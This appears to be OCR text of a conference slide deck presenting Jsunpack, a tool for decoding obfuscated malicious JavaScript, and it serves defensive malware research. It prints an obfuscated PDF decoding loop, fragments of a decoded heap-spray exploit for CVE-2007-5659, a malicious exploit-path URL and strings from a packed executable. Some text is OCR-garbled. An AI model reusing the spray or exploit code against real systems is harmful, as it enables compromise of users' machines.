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+ Problem statement 

+ Prior research and solutions 

+ Jsunpack design and purpose 

+ Jsunpack advantages and disadvantages 

+ Future of understanding threats 

+ Recommendations to research, prevent, and detect threats 
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+ Large volume of malicious JavaScript files 

■ Time and sacrificial research machines 

■ Large scale (SQL injection tools) 

+ Encoded/encrypted JavaScript exploits 

■ eval(), document [write(), writeln(), createElement()], setTimeout(), 
appendChild() 

■ Intrusion Detection Systems 

■ Automatic attacks (JavaScript code generation) 

+ Web-based exploit kits are rapidly evolving and diverse 

■ Commercial Sales 

+ Detection of researchers 
+ Historical threats database 



=n: 



=8 



..iS&*ST 



Prior re se# effiafrd sokitiorW- Maffluajfi 



+ Manual decoding 

■ Modify code, open within browser, repeat 

- Textarea 

- Scripting. FileSystemObject 

- Replacing code 

■ Decoding 

■ Debuggers (Microsoft Script Debugger or Firefox JavaScript debuggers) 



+ Techniques to defeat manual decoding 
Escape sequences 
arguments. callee 
Environment variables, cookies 
Version detection 
Timing / Black listing 
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var my_eval = this.eval; 

this.eval=function (str){ print(str); my_eval(str); } 

+ David Zimmer / jsDecode - faster not safer 

■ http://labsjdefensexom/software/malcode.php#more_malcode+analysis 



+ Techniques to defeat JavaScript hooking 

function fund(){ 

var abc = new Array; 
eval('print (abc);'); 

} 
fundQ; 
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+ SpiderMonkey source code 

■ Modify to output information 

■ http://blog.didierstevens.com/programs/spidermonkey/ 

■ Smjs -f filel .js -f file2.js 

+ Stephan Chenette / "The Ultimate Deobfuscator" (Websense / 
ToorconX) 

■ http://securitylabs.websense.com/content/Blogs/3198.aspx 
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+ Malzilla - bobby has built in nice features and decoding plug-ins 
http://malzilla.sourceforge.net/ 
■ HTML processing, decoding tools, shellcode emulation 



£ Malzilla by bobby 
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+ Safe, not requiring infected machine 

+ Archive content 

+ Simulate browser environment 

+ Process ActiveX, PDF, Flash 

+ Combine best hooking techniques and evaluate multiple paths 

+ Enable analysis despite IP address blocking and filtering 

+ Integrate with IDS, crawling, other research 

+ Goals - 

■ Automatic 

■ NO base64, NO UCS*, NO dec, NO RSA decryption 
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+ 51 1 lines - Python 

■ Acts like browser downloads files parses HTML, PDF, and SWF files 

■ Finds JavaScript and follows scripts and iframes 

■ Automatically handles getElementBylD(), innerHTML, innerText, 
createElement() and various ActiveX functions. 

+ 116 lines - JavaScript 

■ Environment variables 

■ Hooking functions 

■ Simulate ActiveX 

+ 1 to 5 lines - C 

■ Extract vital information 
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Libraries/dependencies 
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+ Decoding loop PDF: 

var p = "1e234v56a7l8"; p = p.replace(/[\+123456789]/g, ""); var 
Prototype = eval(p); 

var s = "32. 1 02 <more numbers> 32".replace(/[A-Za- 

z]/g, function (c){return String.fromCharCode((((c = c.charCodeAt(O)) 
& 223) - 52) % 26 + (c & 32) + 65);}).split("."); var p = ""; for (var i=0; 
i<s. length; i++){ p += String.fromCharCode(s[i]); } 

function uSQXcfcd2(){ Prototype(p); } 

this.uSQXcfcd2(); 
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+ Becomes (PDF Exploit CVE-2007-5659): 

eval function get_spray(spray, len){ while (spray.length*2<len){spray 
+= spray;} spray = spray.substring(0,len/2); return spray; } function 
gln(num, content){ var z = ""; for (var i = 0; i < num; i++){ z += 
<CUT> var overflow = unescape("%u0c0c%u0c0c"); 
while(overflow.length < 44952) overflow += overflow; 
this.collabStore = Collab.collectEmaillnfo({subj: m, ,msg: 
overflow}); } //jsunpack.called Collab.collectEmaillnfo with and 
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Exploit path: http://jsunpack.jeek.org/dec/go7urNgoogle-analitycs.lijg.ru 

2) HTML JavaScript 

3) Exploit JavaScript and load PDF 

4) PDF 

5) JavaScript PDF eval 

6) JavaScript PDF Exploit 

7) Executable 
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+ Find JavaScript code 

■ Decoded HTML 

- iframe script 

- Redirects 

■ Flash Redirects 

+ Find executables, PDF, Flash, and other content 
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+ Use ClamAV to statically unpack executables 

■ Clamscan -leave-temps (Upack, FSG, and lots more) 

■ Look for strings: URLs, file names, registry keys 

Sections ( PSyO«egA @ -@ -...@u@ ) 
File: MS-DOS executable, MZ for MS-DOS 
Packer: Upack V0.37 -> Dwing, 

Strings:UNPACKED Software\microsoft\windows\currentversion\Explorer\shellexecutehooks 

Strings:UNPACKED Software\microsoft\windows\currentversion\Explorer 

Strings:UNPACKED ntoskrnl.exe 

Strings:UNPACKED b.Asp 

Strings:UNPACKED/Vkm.Asp?act=read 
Size:21 879 bytes, 
MD5: 17de546a1ff8754515b09f9c3d67ee56 

+ Send executables to automatic analysis tools 

■ Secureworks Truman, ThreatExpert, Anubis, Joebox 
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+ Evaluate multiple paths (automatic mechanisms under 
development) 

■ Alter environment - IE6 vs. IE7 

■ SpiderMonkey, cscript.exe, V8 (google/open source) 

+ Time gap, IP blocking, DoS, cookies, referer, User-Agent 

+ Automatic border cases 

■ Malformed HTML, malformed JavaScript 

+ Challenges in simulation 

■ Access to DOM Object 

+ Dangers of decoding browser/JavaScript engine exploits 
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+ Jsunpack is a short term and long-term adaptable solution 

■ Decodes most of the hidden JavaScript in the wild today 

■ Fast and easy to adapt environment 

- Hooking new functions 

■ Multi-path evaluation capabilities 

+ Live analysis using Honeyclients with "The Ultimate Deobfuscator" 

■ More costly and time-intensive, infecting machines 

■ Less ongoing maintenance 

+ Plug-in boundary problems browser, PDF, SWF 
+ Timing issues 
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+ Jsunpack - http://jsunpack.jeek.org/ 

■ Monitor exploitation of known and unknown vulnerabilities 

■ Decoded JavaScript is a good place to start 

■ Alerting rules, mailing lists, and researchers 

+ Intrusion Detection Systems 

■ Detect malicious or encoded JavaScript 

■ JavaScript preprocessor (bad, performance issues) 

■ Unified output plug-in (currently under investigation) 

+ Attackers using IP Address blocking (in-the-cloud? private?) 

+ PDF developers must allow users to permanently disable JavaScript 

+ SWF developers may also be able to limit exposure to redirects 

+ NoScript 

+ Secunia Personal Software Inspector 

■ (Less than 2 percent of PCs are fully patched) 
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